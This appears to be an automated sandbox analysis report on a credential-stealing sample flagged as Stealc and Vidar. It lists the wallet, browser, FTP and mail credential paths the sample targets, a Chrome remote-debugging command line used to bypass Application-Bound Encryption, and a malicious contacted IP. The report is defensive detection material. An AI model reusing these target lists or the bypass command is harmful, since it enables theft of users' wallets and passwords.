Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Jaxx Desktop (old)
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: info.seco
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \jaxx\Local Storage\
Source: random(1).exe, 00000000.00000002.2013235084.00000000008F7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\\Exodus\exodus.wallet\\passphrase.jsonq
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: Exodus\exodus.wallet
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsonK+
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: file__0.localstorage
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D54000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Coinomi\Coinomi\wallets\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: \Exodus\exodus.wallet\
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: MultiDoge
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D35000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: seed.seco
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013442010.0000000000D04000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: 1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: random(1).exe, 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\*.*
Tries to harvest and steal Bitcoin Wallet information
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-wal Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Exodus\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Binance\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\ Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\ Jump to behavior
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003 Jump to behavior
Source: C:\Users\user\Desktop\random(1).exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004 Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\Desktop\random(1).exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Yara detected Stealc
Source: Yara match File source: 00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: random(1).exe PID: 7600, type: MEMORYSTR
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670C40 sqlite3_bind_zeroblob, 0_2_6C670C40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670D60 sqlite3_bind_parameter_name, 0_2_6C670D60
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C598EA0 sqlite3_clear_bindings, 0_2_6C598EA0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C670B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob, 0_2_6C670B40
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C596410 bind,WSAGetLastError, 0_2_6C596410
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp, 0_2_6C59C050
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C596070 PR_Listen, 0_2_6C596070
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C59C030 sqlite3_bind_parameter_count, 0_2_6C59C030
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5960B0 listen,WSAGetLastError, 0_2_6C5960B0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5222D0 sqlite3_bind_blob, 0_2_6C5222D0
Source: C:\Users\user\Desktop\random(1).exe Code function: 0_2_6C5963C0 PR_Bind, 0_2_6C5963C0
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1629904 Sample: random(1).exe Startdate: 05/03/2025 Architecture: WINDOWS Score: 100 40 Suricata IDS alerts for network traffic 2->40 42 Found malware configuration 2->42 44 Antivirus detection for URL or domain 2->44 46 8 other signatures 2->46 7 random(1).exe 33 2->7         started        process3 dnsIp4 26 185.215.113.115, 49733, 49759, 80 WHOLESALECONNECTIONSNL Portugal 7->26 28 127.0.0.1 unknown unknown 7->28 18 C:\Users\user\AppData\...\places.sqlite-shm, data 7->18 dropped 20 C:\Users\user\AppData\...\cookies.sqlite-shm, data 7->20 dropped 22 C:\Users\user\AppData\...\vcruntime140[1].dll, PE32 7->22 dropped 24 11 other files (none is malicious) 7->24 dropped 48 Detected unpacking (changes PE section rights) 7->48 50 Attempt to bypass Chrome Application-Bound Encryption 7->50 52 Tries to detect sandboxes and other dynamic analysis tools (window names) 7->52 54 11 other signatures 7->54 12 chrome.exe 7->12         started        file5 signatures6 process7 dnsIp8 30 192.168.2.4, 138, 443, 49308 unknown unknown 12->30 32 239.255.255.250 unknown Reserved 12->32 15 chrome.exe 12->15         started        process9 dnsIp10 34 plus.l.google.com 142.250.185.110, 443, 49748 GOOGLEUS United States 15->34 36 play.google.com 142.250.185.174, 443, 49750, 49755 GOOGLEUS United States 15->36 38 2 other IPs or domains 15->38
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
142.250.185.68
 www.google.com United States
15169 GOOGLEUS false
142.250.185.110
 plus.l.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
142.250.185.174
 play.google.com United States
15169 GOOGLEUS false
185.215.113.115
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true

Private

IP
